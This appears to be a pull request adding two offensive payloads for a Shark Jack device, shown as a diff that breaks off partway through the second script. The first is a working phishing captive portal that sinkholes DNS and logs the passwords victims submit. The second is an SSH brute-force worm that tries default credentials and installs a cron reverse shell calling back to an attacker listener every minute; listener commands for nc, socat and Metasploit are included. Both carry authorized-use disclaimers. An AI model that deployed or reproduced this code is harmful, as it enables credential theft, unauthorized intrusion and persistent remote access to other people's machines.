### PR TITLE
Network Worm (pretty  spicy)

### DIFF
--- a/payloads/library/recon/Gateway_Ghost/README.md
+++ b/payloads/library/recon/Gateway_Ghost/README.md
@@ -1,0 +1,78 @@
+Title: Gateway Ghost
+Description: Captive portal logger
+Author: Hackazillarex
+Version: 1.0
+
+A lightweight, dependency-free captive portal payload for the Shark Jack Display. It hijacks the guest network, forces devices to a "Connection Lost" login page, and captures credentials without requiring httpd, nginx, or python3.
+⚡ Quick Specs
+
+    Target: Shark Jack Display (Alphawise)
+    Dependencies: socat, dnsmasq (pre-installed)
+    Loot Location: /root/loot/ghost_portal/
+
+    Files Generated:
+    ghost_capture.log — captured credentials
+    portal.log — HTTP request log
+    error.log — service error log
+
+🚀 How It Works
+
+    DNS Sinkhole: Uses dnsmasq to redirect all DNS queries to the Shark Jack IP, forcing browsers to hit the portal.
+    Gateway Lock: Removes the default route and disables IP forwarding, effectively "locking" the network until the portal is satisfied.
+    HTTP Handler: A socat-driven shell script serves the portal HTML and parses POST data for credentials.
+    Unlock: Once the user submits the form (or hits the /authorize endpoint), the gateway is restored and DNS redirects are cleared. (Currently not working yet)
+
+
+⚠️ Known Limitations
+
+For best capture rates, connecting devices should meet these conditions:
+
+Condition:	                  Reason
+New or cached-cleared device:	Previously visited pages may load from browser cache, bypassing the DNS lookup and portal trigger.
+IPv6 disabled:	              Devices with IPv6 enabled may use IPv6 DNS servers assigned by the real router, bypassing the Shark Jack DNS sinkhole.
+New page navigation:	        Visiting a fresh/uncached page triggers a DNS lookup, which the sinkhole catches.
+
+How to Bypass (for testing)
+
+    Clear browser cache: Ctrl+Shift+Del → Clear all → Reload
+    Use Incognito/Private mode
+    Disable IPv6 (Windows): Network Settings → Adapter Properties → Uncheck "Internet Protocol Version 6 (IPv6)"
+
+📂 File Structure
+
+/tmp/portal/
+├── web/portal.html          # Captive portal HTML
+├── dnsmasq.conf             # DNS configuration
+├── dnsmasq_state_locked.conf # All-DNS-redirect-to-Shark-Jack rule
+├── dnsmasq_state_unlocked.conf # Empty (normal DNS passthrough)
+├── dnsmasq_state.conf       # Active state (symlink/copy of above)
+├── toggle_gate.sh           # Lock/unlock gateway + DNS state
+└── portal_handler.sh        # SOCAT HTTP request handler
+
+/root/loot/ghost_portal/
+├── ghost_capture.log        # 🎯 Captured credentials
+├── portal.log               # HTTP request log
+└── error.log                # dnsmasq & socat error output
+
+🔧 Configuration
+
+Edit variables at the top of setup_payload() to customize:
+Variable:	Default	Description
+RUN_DIR:	/tmp/portal	Working directory for config files
+PORTAL_DIR:	$RUN_DIR/web	Location of portal.html
+GHOST_IF:	eth0	Network interface to bind to
+LOOT_BASE:	/root/loot/ghost_portal	Directory where logs are saved
+
+To customize the portal design, edit the embedded HTML in the write_portal_files() function.
+
+  🛠️ Troubleshooting
+
+    Services not starting: Check /root/loot/ghost_portal/error.log for dnsmasq and socat output.
+    Portal not showing up: Ensure the victim device has IPv6 disabled and has cleared its browser cache.
+    Credentials missing: Verify ghost_capture.log permissions and that the POST request hits /ghostcapture.
+
+Legal and Ethical Use
+
+This payload is intended for educational purposes and authorized security testing only. 
+Users are responsible for ensuring they have proper authorization before using this tool on any network.
+The author is not responsible for any misuse of this software.

--- a/payloads/library/recon/Gateway_Ghost/payload.sh
+++ b/payloads/library/recon/Gateway_Ghost/payload.sh
@@ -1,0 +1,262 @@
+#!/bin/bash
+# Title: Gateway Ghost
+# Description: Captive portal logger
+# Author: Hackazillarex
+# Version: 1.0
+#
+# ====================================================================
+# SETUP INSTRUCTIONS
+# ====================================================================
+#
+# NO DEPENDENCIES REQUIRED
+# socat and dnsmasq come pre-installed on the Shark Jack Display.
+#
+# LOOT LOCATION:
+# All logs saved to: /root/loot/ghost_portal/
+#
+# Files generated:
+#   - ghost_capture.log   (credentials)
+#   - portal.log      (HTTP request log)
+#   - error.log       (service error log)
+#
+# ====================================================================
+# KNOWN LIMITATIONS
+# ====================================================================
+#
+# For best results, connecting devices should meet these conditions:
+#
+# 1. NEW OR RETURNING DEVICE WITH CLEARED CACHE
+#    Devices that have previously visited pages on this network
+#    may load them from browser cache, bypassing the portal.
+#    To clear cache in Edge/Chrome: Ctrl+Shift+Del → Clear all
+#    Private/Incognito browsing also bypasses cache.
+#
+# 2. IPv6 DISABLED ON DEVICE
+#    Devices with IPv6 enabled may use IPv6 DNS servers assigned
+#    by the real router, bypassing the Shark Jack DNS sinkhole.
+#    To disable IPv6 on Windows:
+#    Network Settings → Adapter Properties → uncheck IPv6
+#
+# 3. NEW PAGES TRIGGER PORTAL
+#    Previously visited pages load from cache without DNS lookup.
+#    Visiting a new/uncached page will trigger the portal correctly.
+#
+# NOTE: Some functions were removed but logic is still in the payload 
+#       in case I decide to add them back later.
+# ====================================================================
+
+
+setup_payload() {
+  LED SETUP
+  RUN_DIR="/tmp/portal"
+  PORTAL_DIR="$RUN_DIR/web"
+  GHOST_IF="eth0"
+  LOOT_BASE="/root/loot/ghost_portal"
+  mkdir -p "$PORTAL_DIR"
+  mkdir -p "$LOOT_BASE"
+}
+
+get_shark_jack_ip() {
+  /sbin/ip addr show "$GHOST_IF" | grep "inet " | awk '{print $2}' | cut -d/ -f1
+}
+
+initialize_menu() {
+  ADD_MENU_ITEM "Start Ghost Portal" "start_portal"
+  ADD_MENU_ITEM "Stop Portal" "stop_portal"
+  ADD_MENU_ITEM "Quit" "EXIT_MENU"
+}
+
+write_portal_files() {
+  SHARK_JACK_IP=$(get_shark_jack_ip)
+  NET_PREFIX=$(echo "$SHARK_JACK_IP" | cut -d. -f1-3)
+
+  cat > "$PORTAL_DIR/portal.html" << 'HTML'
+<!DOCTYPE html>
+<html lang="en"><head><meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Alert! - Connection Lost</title>
+<style>
+*{box-sizing:border-box;margin:0;padding:0}
+body{font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;background:#f4f5f7;color:#1a1a1a;display:flex;align-items:center;justify-content:center;min-height:100vh;padding:20px}
+.card{background:#fff;border-radius:12px;box-shadow:0 2px 12px rgba(0,0,0,.08);max-width:420px;width:100%;padding:32px 28px;text-align:center}
+h1{font-size:20px;font-weight:600;margin-bottom:8px}
+p{font-size:14px;color:#5f6368;line-height:1.5;margin-bottom:24px}
+input,textarea{width:100%;padding:10px 12px;margin:6px 0 12px;border:1px solid #ddd;border-radius:8px;font-size:14px;font-family:inherit}
+textarea{height:45px;resize:none}
+.btn{display:inline-block;width:100%;background:#1a73e8;color:#fff;border:0;border-radius:8px;padding:12px 20px;font-size:15px;font-weight:600;cursor:pointer}
+.footer{margin-top:20px;font-size:12px;color:#9aa0a6}
+label{font-size:13px;color:#444;text-align:left;display:block}
+</style></head>
+<body><div class="card">
+<h1>Connection Lost!</h1>
+<p> Log In and hit Continue to start browsing.</p>
+<form method="POST" action="/ghostcapture">
+<label>User Name</label>
+<input name="name" placeholder="Enter your user name" required>
+<label>E-mail</label>
+<textarea name="email" placeholder="Enter your email"></textarea>
+<label>Password</label>
+<textarea name="password" placeholder="Enter your password"></textarea>
+<button class="btn" type="submit">Continue</button>
+</form>
+<div class="footer">By continuing you agree to the network's terms of use.</div>
+</div></body></html>
+HTML
+
+  cat > "$RUN_DIR/dnsmasq_state_locked.conf" << EOF
+address=/#/${SHARK_JACK_IP}
+EOF
+
+  cat > "$RUN_DIR/dnsmasq_state_unlocked.conf" << 'EOF'
+EOF
+
+  cp "$RUN_DIR/dnsmasq_state_locked.conf" "$RUN_DIR/dnsmasq_state.conf"
+
+  cat > "$RUN_DIR/dnsmasq.conf" << EOF
+interface=${GHOST_IF}
+dhcp-range=${NET_PREFIX}.100,${NET_PREFIX}.200,1m
+dhcp-option=3,${SHARK_JACK_IP}
+dhcp-option=6,${SHARK_JACK_IP}
+no-resolv
+filter-AAAA
+conf-file=${RUN_DIR}/dnsmasq_state.conf
+EOF
+
+  cat > "$RUN_DIR/toggle_gate.sh" << EOF
+#!/bin/sh
+REAL_GW=\$(ip route | grep default | awk '{print \$3}' | head -1)
+case "\$1" in
+  lock)
+    echo 0 > /proc/sys/net/ipv4/ip_forward
+    ip route del default 2>/dev/null
+    cp ${RUN_DIR}/dnsmasq_state_locked.conf ${RUN_DIR}/dnsmasq_state.conf
+    killall -HUP dnsmasq
+    ;;
+  unlock)
+    [ -n "\$REAL_GW" ] && ip route replace default via "\$REAL_GW" dev ${GHOST_IF}
+    echo 1 > /proc/sys/net/ipv4/ip_forward
+    cp ${RUN_DIR}/dnsmasq_state_unlocked.conf ${RUN_DIR}/dnsmasq_state.conf
+    killall -HUP dnsmasq
+    ;;
+esac
+EOF
+  chmod +x "$RUN_DIR/toggle_gate.sh"
+
+  cat > "$RUN_DIR/portal_handler.sh" << EOF
+#!/bin/sh
+PORTAL_DIR="${PORTAL_DIR}"
+TOGGLE_SCRIPT="${RUN_DIR}/toggle_gate.sh"
+SHARK_JACK_IP=\$(/sbin/ip addr show eth0 | grep "inet " | awk '{print \$2}' | cut -d/ -f1)
+read -r REQUEST_LINE
+REQUEST_LINE=\$(printf "%s" "\$REQUEST_LINE" | tr -d '\r\n')
+CONTENT_LENGTH=0
+while read -r HEADER; do
+  HEADER_CLEAN=\$(printf "%s" "\$HEADER" | tr -d '\r\n')
+  [ -z "\$HEADER_CLEAN" ] && break
+  case "\$HEADER_CLEAN" in
+    [Cc]ontent-[Ll]ength:*) CONTENT_LENGTH=\$(printf "%s" "\$HEADER_CLEAN" | awk -F': *' '{print \$2}') ;;
+  esac
+done
+[ "\$CONTENT_LENGTH" -gt 0 ] 2>/dev/null && POST_DATA=\$(dd bs=1 count="\$CONTENT_LENGTH" 2>/dev/null) || POST_DATA=""
+METHOD=\$(printf "%s" "\$REQUEST_LINE" | awk '{print \$1}')
+PATH_REQ=\$(printf "%s" "\$REQUEST_LINE" | awk '{print \$2}')
+printf "[%s] %s\n" "\$(/bin/date '+%H:%M:%S')" "\$REQUEST_LINE" >> /root/loot/ghost_portal/portal.log
+CACHE="Cache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nExpires: 0\r\nConnection: close\r\n"
+PORTAL_URL="http://\${SHARK_JACK_IP}/portal.html"
+send() {
+  BODY="\$3"
+  if [ "\$METHOD" = "HEAD" ]; then
+    printf "%s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\${CACHE}%s\r\n" "\$1" "\$2" "\${#BODY}" "\$4"
+  else
+    printf "%s\r\nContent-Type: %s\r\nContent-Length: %s\r\n\${CACHE}%s\r\n%s" "\$1" "\$2" "\${#BODY}" "\$4" "\$BODY"
+  fi
+}
+case "\$PATH_REQ" in
+  /connecttest.txt|/ncsi.txt)
+    BODY="<html><head><meta http-equiv='refresh' content='0;url=\${PORTAL_URL}'></head><body>Redirecting...</body></html>"
+    send "HTTP/1.1 302 Found" "text/html" "\$BODY" "Location: \${PORTAL_URL}\r\n" ;;
+  /generate_204|/captiveportal/generate_204)
+    send "HTTP/1.1 200 OK" "text/html" "" ;;
+  /library/test/success.html|/hotspot-detect.html)
+    BODY="<HTML><HEAD><TITLE>Redirect</TITLE><meta http-equiv='refresh' content='0;url=\${PORTAL_URL}'></HEAD><BODY>Redirecting...</BODY></HTML>"
+    send "HTTP/1.1 302 Found" "text/html" "\$BODY" "Location: \${PORTAL_URL}\r\n" ;;
+  /authorize)
+    "\$TOGGLE_SCRIPT" unlock >/dev/null 2>&1
+    BODY="<html><body style='font-family:Arial;text-align:center;padding:40px'><h2>You're connected!</h2><p>Internet access is now open. Enjoy!</p></body></html>"
+    send "HTTP/1.1 200 OK" "text/html" "\$BODY" ;;
+  /ghostcapture)
+    if [ -n "\$POST_DATA" ]; then
+      DECODED=\$(printf "%s" "\$POST_DATA" | sed 's/+/ /g' | sed 's/%21/!/g' | sed 's/%22/"/g' | sed 's/%23/#/g' | sed 's/%24/\$/g' | sed 's/%25/%/g' | sed 's/%26/\&/g' | sed 's/%27/'"'"'/g' | sed 's/%28/(/g' | sed 's/%29/)/g' | sed 's/%2C/,/g' | sed 's/%2E/./g' | sed 's/%2F/\//g' | sed 's/%3A/:/g' | sed 's/%3D/=/g' | sed 's/%3F/?/g' | sed 's/%40/@/g' | sed 's/%5E/^/g' | sed 's/%5F/_/g' | sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed "s/%[0-9A-Fa-f][0-9A-Fa-f]//g")
+      NAME=\$(printf "%s" "\$DECODED" | sed 's/name=//;s/&password=.*//')
+      PASSWORD=\$(printf "%s" "\$DECODED" | sed 's/.*&password=//')
+      printf "[%s] User Name & E-mail: %s | Password: %s\n" "\$(/bin/date '+%Y-%m-%d %H:%M:%S')" "\$NAME" "\$PASSWORD" >> /root/loot/ghost_portal/ghost_capture.log
+    fi
+    "\$TOGGLE_SCRIPT" unlock >/dev/null 2>&1
+    BODY="<html><body style='font-family:Arial;text-align:center;padding:40px'><h2>Thank you for confirming your account!</h2><p>Internet access is now open. Enjoy!</p></body></html>"
+    send "HTTP/1.1 200 OK" "text/html" "\$BODY" ;;
+  *)
+    if [ -f "\$PORTAL_DIR/portal.html" ]; then
+      BODY=\$(cat "\$PORTAL_DIR/portal.html")
+      send "HTTP/1.1 200 OK" "text/html" "\$BODY"
+    else
+      send "HTTP/1.1 404 Not Found" "text/plain" "Not found"
+    fi ;;
+esac
+EOF
+  chmod +x "$RUN_DIR/portal_handler.sh"
+}
+
+start_portal() {
+  LOG "Ghost Portal: Waiting for network..."
+  sleep 5
+  LOG "Ghost Portal: Deploying files..."
+  write_portal_files
+
+  LOG "Ghost Portal: Locking guest network..."
+  LED ATTACK
+  "$RUN_DIR/toggle_gate.sh" lock
+
+  pkill -9 dnsmasq 2>/dev/null
+  sleep 2
+  dnsmasq -C "$RUN_DIR/dnsmasq.conf" >> "$LOOT_BASE/error.log" 2>&1 &
+  sleep 2
+
+  pkill -f "socat TCP-LISTEN:80" 2>/dev/null
+  sleep 1
+  socat TCP-LISTEN:80,reuseaddr,fork EXEC:"$RUN_DIR/portal_handler.sh" >> /root/loot/ghost_portal/portal.log 2>> "$LOOT_BASE/error.log" &
+  sleep 1
+
+  if pgrep -f "dnsmasq -C" > /dev/null && pgrep -f "socat TCP-LISTEN:80" > /dev/null; then
+    LED READY
+    ALERT "Ghost Portal Active\n\nShark Jack: $(get_shark_jack_ip)\nNetwork: LOCKED\nGuests see captive portal" 2 false
+  else
+    DNSMASQ_STATUS=$(pgrep -f "dnsmasq -C" > /dev/null && echo "OK" || echo "FAILED")
+    SOCAT_STATUS=$(pgrep -f "socat TCP-LISTEN:80" > /dev/null && echo "OK" || echo "FAILED")
+    echo "[$(date '+%Y-%m-%d %H:%M:%S')] dnsmasq: $DNSMASQ_STATUS socat: $SOCAT_STATUS" >> "$LOOT_BASE/error.log"
+    LED FAIL
+    ALERT "Service Start Error\n\ndnsmasq: $DNSMASQ_STATUS\nHTTP: $SOCAT_STATUS" 3 false
+  fi
+}
+
+stop_portal() {
+  LOG "Ghost Portal: Stopping..."
+  pkill -9 -f "dnsmasq -C" 2>/dev/null
+  pkill -9 -f "socat TCP-LISTEN:80" 2>/dev/null
+  echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
+  ip route del default 2>/dev/null
+  rm -f /tmp/portal/dnsmasq.leases 2>/dev/null
+  LED FINISH
+  ALERT "Ghost Portal Stopped" 2 false
+}
+
+setup_payload
+initialize_menu
+ALERT "Gatway Ghost\nv1.0\nCaptive Portal\nby Hackazillarex\n<- to Start" -1 false true
+START_MENU
+
+# Cleanup on exit
+pkill -9 -f "dnsmasq -C" 2>/dev/null
+pkill -9 -f "socat TCP-LISTEN:80" 2>/dev/null
+echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
+
+LED FINISH

--- a/payloads/library/recon/Network_Worm/README.md
+++ b/payloads/library/recon/Network_Worm/README.md
@@ -1,0 +1,197 @@
+# Network Worm v1.0
+
+**Autonomous SSH Network Propagation Tool for Hak5 Shark Jack Display**
+
+A sophisticated network scanning and SSH brute-force payload that identifies live hosts, compromises them with weak credentials, and deploys persistent reverse shells via cron jobs.
+
+## Features
+
+- **Network Discovery**: Fast nmap-based host scanning across network segments
+- **SSH Brute Force**: Automated credential testing with 9 common username/password combinations
+- **OS Detection**: Identifies Linux vs Windows targets and deploys appropriate payloads
+- **Persistent Reverse Shell**: Cron-based reverse shell on Linux targets (automatic callback every minute)
+- **Credential Logging**: Complete log of all compromised hosts with timestamps
+- **Interactive Menu System**: User-friendly menu for configuration and monitoring
+- **Comprehensive Logging**: Detailed session logs and error tracking
+
+## Prerequisites
+
+### Shark Jack Display
+- Hak5 Shark Jack Display device
+- Network connectivity to target network
+- **sshpass** installed (required)
+  ```bash
+  opkg update
+  opkg install sshpass
+  ```
+
+### Target Network
+- Linux/Unix targets with SSH enabled
+- Weak or default credentials (root:root, admin:admin, test:test, etc.)
+- Network access from Shark Jack to target devices
+
+### Listener Server (Attacker)
+- Netcat or socat for reverse shell handling
+- Open port for incoming connections (default: 4444)
+
+## Installation
+
+1. Copy `payload.sh` to Shark Jack:
+   ```bash
+   scp payload.sh root@172.16.24.1:/root/library/my_payloads/Network_Worm/payload.txt
+   ```
+
+2. Ensure sshpass is installed on Shark Jack:
+   ```bash
+   ssh root@172.16.24.1
+   opkg update
+   opkg install sshpass
+   ```
+
+## Usage
+
+### Basic Workflow
+
+1. **Start the payload** on Shark Jack Display
+2. **Configure Listener Host** - Enter your C2 server IP and port
+3. **Start Worm Propagation** - Payload will:
+   - Scan the network for live hosts
+   - Attempt SSH brute force on each host
+   - Detect target OS (Linux/Windows)
+   - Deploy persistent reverse shell to Linux targets
+   - Log all compromised credentials
+
+### Menu Options
+
+- **Configure Listener Host**: Set C2 callback IP and port
+- **Start Worm Propagation**: Execute the attack
+- **View Compromised Hosts**: Display list of compromised systems with credentials
+- **View Worm Log**: Detailed session logs
+- **Stop Worm**: Cleanup and stop running processes
+- **Quit**: Exit payload
+
+## Listener Setup
+
+### Single Session (Simple)
+```bash
+nc -lvnp 4444
+```
+
+### Multiple Sessions with socat
+```bash
+socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash
+```
+
+### Multiple Sessions with Metasploit
+```bash
+msfconsole
+> use exploit/multi/handler
+> set PAYLOAD linux/x86/shell_reverse_tcp
+> set LHOST 10.0.0.222
+> set LPORT 4444
+> exploit -j
+```
+
+## How It Works
+
+### Scanning Phase
+1. Detects Shark Jack's IP and network range
+2. Determines if single-device or full-network mode
+3. Performs nmap ping scan to find live hosts
+4. Filters out Shark Jack's own IP
+
+### Exploitation Phase
+For each discovered host:
+1. Tests 9 common SSH credentials
+2. On successful login:
+   - Detects OS type (Linux/Windows)
+   - Extracts hostname/IP for logging
+   - For Linux: Deploys cron-based reverse shell
+   - For Windows: Logs credentials only
+
+### Persistence
+Linux targets get a cron job:
+```bash
+* * * * * nc 10.0.0.222 4444 -e /bin/sh 2>/dev/null &
+```
+This executes every minute and connects back to your listener with shell access.
+
+## Default Credentials Tested
+
+The payload attempts these credential combinations:
+- root:root
+- root:password
+- root:12345
+- admin:admin
+- admin:password
+- admin:12345
+- test:test
+- oracle:oracle
+- postgres:postgres
+
+## Logging
+
+All activities logged to `/root/loot/network_worm/`:
+
+- **compromised_hosts.log**: List of successfully compromised hosts with credentials
+- **worm_session_TIMESTAMP.txt**: Detailed session log with all scan results
+
+## Payload Configuration
+
+Edit these values in the script to customize:
+
+```bash
+LISTENER_HOST="010.000.000.222"  # Your C2 server (padded IP format)
+LISTENER_PORT="4444"              # Your listener port
+LOOT_BASE="/root/loot/network_worm"  # Local loot storage
+```
+
+## Important Notes
+
+### IP Address Format
+Listener IP uses padded format (e.g., `010.000.000.222`) for menu consistency. The payload automatically strips leading zeros before deployment, converting to standard format (e.g., `10.0.0.222`).
+
+### Reverse Shell Callback
+- Linux targets callback every minute via cron
+- Ensure your listener is running BEFORE or immediately WHEN worms execute
+- Multiple compromised hosts can connect to same listener on same port
+
+### Cleanup
+To remove deployed cron jobs from compromised machines:
+```bash
+ssh root@<target_ip>
+crontab -r
+```
+
+## Troubleshooting
+
+### Scan finds 0 hosts
+- Verify network connectivity from Shark Jack
+- Check network range (default: /24 from Shark Jack's subnet)
+- Verify hosts are actually live and reachable
+
+### No reverse shells connecting
+- Verify listener is running on configured IP/port
+- Check firewall allows inbound on listener port
+- Verify IP address format (should be converted from padded to standard)
+- Check compromised host can reach listener IP
+
+## Security Considerations
+
+- **Loud**: This payload generates significant network traffic and logs
+- **Credentials**: Default credentials may be changed in real environments
+- **Detection**: Brute force attempts and cron jobs are easily detectable
+- **Persistence**: Cron jobs remain until manually removed
+
+## Disclaimer
+
+This payload is for authorized security testing only. Unauthorized access to computer systems is illegal. Always obtain written permission before testing.
+
+## Author
+
+Hackazillarex
+
+## License
+
+Use only on authorized networks with explicit permission.
+

--- a/payloads/library/recon/Network_Worm/payload.sh
+++ b/payloads/library/recon/Network_Worm/payload.sh
@@ -1,0 +1,337 @@
+#!/bin/bash
+# Title: Network Worm
+# Description: SSH Scanner + Autonomous Propagation Worm
+# Author: Hackazillarex
+# Version: 1.0 
+#
+# ====================================================================
+# SETUP INSTRUCTIONS
+# ====================================================================
+#  VERY IMPORTANT: you need to install sshpass on the Shark Jack FIRST!
+# opkg update
+# opkg install sshpass
+#
+#
+# LOOT LOCATION:
+# All logs and compromised host information saved to:
+# /root/loot/network_worm/
+#
+# Files generated:
+#   - worm_session_TIMESTAMP.txt     (detailed session log)
+#   - compromised_hosts.log          (list of compromised IPs)
+#
+# PREREQUISITES:
+# 1. Ensure target device(s) have SSH enabled with weak credentials
+#    Example weak credentials to test:
+#      - root:root
+#      - admin:admin
+#      - test:test
+#
+# 2. On your Listener server (attacker machine), start a listener:
+#
+#    LISTENER COMMAND (Single Session):
+#    $ nc -lvnp 4444
+#
+#    LISTENER COMMAND (Multiple Sessions with socat):
+#    $ socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash
+#
+#    LISTENER COMMAND (Multiple Sessions with Metasploit):
+#    $ msfconsole
+#    > use exploit/multi/handler
+#    > set PAYLOAD linux/x86/shell_reverse_tcp
+#    > set LHOST 10.0.0.222
+#    > set LPORT 4444
+#    > exploit -j
+#
+#    This opens port 4444 waiting for reverse shell connections
+#    Replace 4444 with your desired port
+#
+# 3. Configure the payload:
+#    - Select "Configure Listener Host"
+#    - Enter your Listener machine IP (e.g., 010.000.000.222)
+#    - Enter listening port (e.g., 4444)
+#
+# 4. Start the worm:
+#    - Select "Start Worm Propagation"
+#    - Payload will scan network for SSH services
+#    - Attempt brute force with default credentials
+#    - Deploy reverse shell to compromised hosts
+#    - Reverse shells connect back to your listener
+#
+# 5. Interact with compromised hosts:
+#    When you see a connection in your listener:
+#    $ whoami          # verify user
+#    $ hostname        # check device
+#    $ id              # check privileges
+#
+# NETWORK REQUIREMENTS:
+# - Shark Jack must be on same network as target devices
+# - All devices need IP connectivity
+# - Target must have SSH port 22 open
+#
+# ====================================================================
+
+
+
+setup_payload() {
+  LOOT_BASE="/root/loot/network_worm"
+  OUTFILE=""
+  INTERFACE="eth0"
+  LISTENER_HOST=""
+  LISTENER_PORT="4444"
+  
+  LED SETUP
+  mkdir -p "$LOOT_BASE"
+}
+
+log_both() {
+  LOG "$1"
+  echo "$1" >> "$OUTFILE"
+}
+
+initialize_menu() {
+  ADD_MENU_ITEM "Configure Listener Host" "configure_listener"
+  ADD_MENU_ITEM "Start Worm Propagation" "start_worm"
+  ADD_MENU_ITEM "View Compromised Hosts" "view_compromised"
+  ADD_MENU_ITEM "View Worm Log" "view_worm_log"
+  ADD_MENU_ITEM "Stop Worm" "stop_worm"
+  ADD_MENU_ITEM "Quit" "EXIT_MENU"
+}
+
+configure_listener() {
+  while true; do
+    LISTENER_HOST=$(TEXT_PICKER "Enter Listener Host IP" "010.000.000.222")
+    
+    # Validate input 
+    if [[ $LISTENER_HOST =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
+      break
+    else
+      ALERT "Invalid IP format\n\nEnter IP like: 010.000.000.222" 3 false
+    fi
+  done
+  
+  LISTENER_PORT=$(NUMBER_PICKER "Enter Listener Port" "4444")
+  
+  ALERT "Listener Configured\n\nHost: $LISTENER_HOST\nPort: $LISTENER_PORT" 2 false
+  log_both "[+] Listener configured: $LISTENER_HOST:$LISTENER_PORT"
+}
+
+get_shark_jack_ip() {
+  /sbin/ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1
+}
+
+start_worm() {
+  TS=$(date +%F_%H-%M-%S)
+  OUTFILE="$LOOT_BASE/worm_session_$TS.txt"
+  touch "$OUTFILE"
+  
+  SHARK_JACK_IP=$(get_shark_jack_ip)
+  NET=$(echo $SHARK_JACK_IP | cut -d. -f1-3)
+  
+  if [ -z "$LISTENER_HOST" ]; then
+    ALERT "Configure Listener Host First" 3 false
+    return
+  fi
+  
+  log_both "=== Network Worm v1.0 ==="
+  log_both "Timestamp: $TS"
+  log_both "Shark Jack IP: $SHARK_JACK_IP"
+  log_both ""
+  
+  LOG "Network Worm: Detecting network topology..."
+  LED ATTACK
+  
+  # Detect network size - quick ping sweep
+  CREATE_SPINNER "Scanning network..."
+  LIVE_COUNT=$(timeout 5 nmap -sn $NET.0/24 2>/dev/null | grep "Nmap scan report" | wc -l)
+  STOP_SPINNER
+  
+  log_both "Live hosts detected: $LIVE_COUNT"
+  
+  # Decide mode based on network size
+  if [ $LIVE_COUNT -le 2 ]; then
+    log_both "[*] Single device mode detected (<=2 hosts)"
+    SCAN_NETWORK="$NET.0/24"
+  else
+    log_both "[*] Full network mode (>2 hosts)"
+    SCAN_NETWORK="$NET.0/24"
+  fi
+  
+  log_both "Scan Range: $SCAN_NETWORK"
+  log_both "Listener: $LISTENER_HOST:$LISTENER_PORT"
+  log_both ""
+  
+  # Create reverse shell payload
+  cat > /tmp/worm_payload.sh << 'WORM'
+#!/bin/sh
+LOOT_DIR="/root/loot/network_worm"
+mkdir -p "$LOOT_DIR"
+LISTENER_HOST="$1"
+LISTENER_PORT="$2"
+# Strip leading zeros from IP octets (e.g., 010.000.000.222 -> 10.0.0.222)
+LISTENER_HOST=$(echo "$LISTENER_HOST" | sed 's/\.0*/./g' | sed 's/^0*//')
+CURRENT_IP=$(hostname -I | awk '{print $1}')
+echo "[$(date '+%Y-%m-%d %H:%M:%S')] Compromised: $CURRENT_IP" >> "$LOOT_DIR/compromised_hosts.log"
+(sleep 1; nc $LISTENER_HOST $LISTENER_PORT -e /bin/sh) &
+WORM
+  
+  chmod +x /tmp/worm_payload.sh
+  log_both "[+] Payload created"
+  
+  # SSH brute force with common credentials
+  declare -a CREDENTIALS=(
+    "root:root"
+    "root:password"
+    "root:12345"
+    "admin:admin"
+    "admin:password"
+    "admin:12345"
+    "test:test"
+    "oracle:oracle"
+    "postgres:postgres"
+  )
+  
+  log_both ""
+  log_both "=== SSH Scanning Network ==="
+  log_both ""
+  
+  # Scan network
+  CREATE_SPINNER "Scanning for SSH services..."
+  
+  # Make sure SHARK_JACK_IP is set
+  if [ -z "$SHARK_JACK_IP" ]; then
+    SHARK_JACK_IP=$(get_shark_jack_ip)
+  fi
+  
+  # Extract IPs directly from nmap output - get IP from "Nmap scan report for X.X.X.X" lines
+  LIVE_HOSTS=$(timeout 10 nmap -sn $SCAN_NETWORK 2>/dev/null | grep "Nmap scan report for" | awk '{print $NF}')
+  STOP_SPINNER
+  
+  # Filter out Shark Jack IP
+  LIVE_HOSTS=$(echo "$LIVE_HOSTS" | grep -v "^$SHARK_JACK_IP$")
+  
+  # Count non-empty lines
+  HOST_COUNT=0
+  while IFS= read -r host; do
+    if [ -n "$host" ]; then
+      HOST_COUNT=$((HOST_COUNT + 1))
+    fi
+  done <<< "$LIVE_HOSTS"
+  
+  log_both "[+] Found $HOST_COUNT live hosts"
+  
+  COMPROMISED=0
+  
+  # Try each host
+  for host in $LIVE_HOSTS; do
+    log_both ""
+    log_both "Target: $host"
+    
+    COMPROMISED_FLAG=0
+    
+    for cred in "${CREDENTIALS[@]}"; do
+      user=$(echo $cred | cut -d: -f1)
+      pass=$(echo $cred | cut -d: -f2)
+      
+      # Use sshpass for SSH password authentication
+      sshpass -p "$pass" ssh -o ConnectTimeout=2 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "$user@$host" "whoami" > /tmp/ssh_result.txt 2>&1
+      
+      SSH_EXIT=$?
+      
+      # Check if login was successful (exit code 0)
+      if [ $SSH_EXIT -eq 0 ]; then
+        log_both "[+] SUCCESS: $user:$pass @ $host"
+        
+        # Log to compromised hosts file on Shark Jack
+        echo "[$(date '+%Y-%m-%d %H:%M:%S')] $user:$pass @ $host" >> "$LOOT_BASE/compromised_hosts.log"
+        
+        COMPROMISED=$((COMPROMISED + 1))
+        COMPROMISED_FLAG=1
+        
+        # Detect OS type
+        OS_TYPE=$(sshpass -p "$pass" ssh -o ConnectTimeout=2 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "$user@$host" "uname -s" 2>/dev/null)
+        log_both "[*] Target OS: $OS_TYPE"
+        
+        # Deploy worm based on OS
+        log_both "[*] Deploying worm to $host..."
+        
+        if echo "$OS_TYPE" | grep -qi "Linux\|Darwin\|BSD"; then
+          # Linux/Unix - deploy cron reverse shell
+          # Strip leading zeros from Listener IP (010.000.000.222 -> 10.0.0.222)
+          IFS='.' read -r o1 o2 o3 o4 <<< "$LISTENER_HOST"
+          LISTENER_IP_CLEAN="$((10#$o1)).$((10#$o2)).$((10#$o3)).$((10#$o4))"
